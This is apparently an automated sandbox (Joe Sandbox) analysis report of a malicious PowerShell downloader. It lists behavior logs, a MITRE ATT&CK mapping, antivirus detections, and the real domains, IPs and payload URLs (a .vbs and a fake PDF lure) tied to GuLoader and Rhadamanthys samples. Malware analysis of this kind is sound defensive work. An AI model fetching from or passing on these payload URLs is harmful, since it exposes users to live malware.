      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
MITRE ATT&CK Matrix (techniques listed per tactic column; the matrix's count badges are given in parentheses after the technique they belong to)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: PowerShell (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: Scripting (1); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (31); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (21)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph
Behavior Graph ID: 1578221
Sample: 2rTi9MgX25.ps1
Startdate: 19/12/2024
Architecture: WINDOWS
Score: 84

DNS/IP nodes: x1.i.lencr.org; www.bluemaxxlaser.com; 3 other IPs or domains
Signatures on the sample: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; 3 other signatures
Processes started from the sample: powershell.exe (16 23); svchost.exe

powershell.exe -> www.bluemaxxlaser.com 203.175.174.69, 49723, 80 SGGS-AS-APSGGSSG Singapore
powershell.exe -> astenterprises.com.pk 107.161.23.150, 443, 49712 RAMNODEUS United States
powershell.exe -> signature: Powershell creates an autostart link
powershell.exe -> started: powershell.exe (23); Acrobat.exe (18 73); conhost.exe
svchost.exe -> 127.0.0.1 unknown unknown

powershell.exe (child) -> signature: Loading BitLocker PowerShell Module
Acrobat.exe -> started: AcroCEF.exe (105)
AcroCEF.exe -> started: AcroCEF.exe

Source | Detection | Scanner | Label | Link
2rTi9MgX25.ps1 | 34% | ReversingLabs | Script-PowerShell.Downloader.Boxter |
2rTi9MgX25.ps1 | 42% | Virustotal | | Browse
2rTi9MgX25.ps1 | 100% | Avira | TR/PShell.Dldr.VPA |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label | Link
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk | 0% | Avira URL Cloud | safe |
http://www.bluemaxxlaser.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |
http://www.bluemaxxlaser.com | 0% | Avira URL Cloud | safe |
http://www.astenterprises.com.pk | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | 0% | Avira URL Cloud | safe |
http://astenterprises.com.pk | 0% | Avira URL Cloud | safe |
http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |
https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
www.astenterprises.com.pk | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | Avira URL Cloud: safe | unknown
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/List | powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.1520565660.0000025F44292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33FF54000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000001.00000002.1622194811.0000025F5B900000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000009.00000003.1475779786.0000014B432D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | false | | high
http://crl.ver) | svchost.exe, 00000009.00000002.2582093063.0000014B43400000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs | powershell.exe, 00000001.00000002.1520565660.0000025F43892000.00000004.00000800.00020000.00000000.sdmp, 2rTi9MgX25.ps1 | true | Avira URL Cloud: safe | unknown
https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p | powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.astenterprises.com.pk | powershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.adobe.co | ReaderMessages.6.dr | false | | high
http://astenterprises.com.pk | powershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.9.dr | false | | high
https://www.astenterprises.com.pk | powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F4514B000.00000004.00000800.00020000.00000000.sdmp | false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.bluemaxxlaser.compowershell.exe, 00000001.00000002.1520565660.0000025F451A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F451E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
203.175.174.69 | www.bluemaxxlaser.com | Singapore | 24482 | SGGS-AS-APSGGSSG | false
107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | false
                                                              IP
                                                              127.0.0.1
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1578221
                                                              Start date and time:2024-12-19 12:43:14 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 45s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:18
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:2rTi9MgX25.ps1
                                                              renamed because original name is a hash value
                                                              Original Sample Name:89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf.ps1
                                                              Detection:MAL
                                                              Classification:mal84.evad.winPS1@20/59@5/3
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 83%
                                                              • Number of executed functions: 5
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .ps1
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.218.208.137, 172.64.41.3, 162.159.61.3, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 23.218.208.109, 23.195.61.56, 2.19.198.27, 23.32.239.65, 23.32.239.56, 184.30.20.134, 23.32.239.9, 23.32.238.74, 23.32.238.18, 13.107.246.63, 172.202.163.200
                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, time.windows.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 7572 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7796 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:44:20 | API Interceptor | 70x Sleep call for process: powershell.exe modified
06:44:33 | API Interceptor | 2x Sleep call for process: svchost.exe modified
08:14:35 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.175.174.69 | fs8cRx6Us2.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | ER4HMMzeQ3.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | FjfZ7uM8zh.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | yswmdaREME.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 0bNBLjPn56.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 64Tgzu2FKh.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rheu.bin
203.175.174.69 | zp.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rh.bin
203.175.174.69 | eua.ps1 | malicious | GuLoader | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | zp.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | zk.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
107.161.23.150 | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS
107.161.23.150 | FjfZ7uM8zh.lnk | malicious | Unknown
107.161.23.150 | yswmdaREME.lnk | malicious | Unknown
107.161.23.150 | 0bNBLjPn56.lnk | malicious | Unknown
107.161.23.150 | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
107.161.23.150 | List of required items pdf.vbs | malicious | GuLoader
107.161.23.150 | List of required items and services pdf.vbs | malicious | GuLoader
107.161.23.150 | List of required items pdf.vbs | malicious | GuLoader
107.161.23.150 | List of required items and services pdf.vbs | malicious | GuLoader
107.161.23.150 | xw0K5Lahxz.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.bluemaxxlaser.com | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69
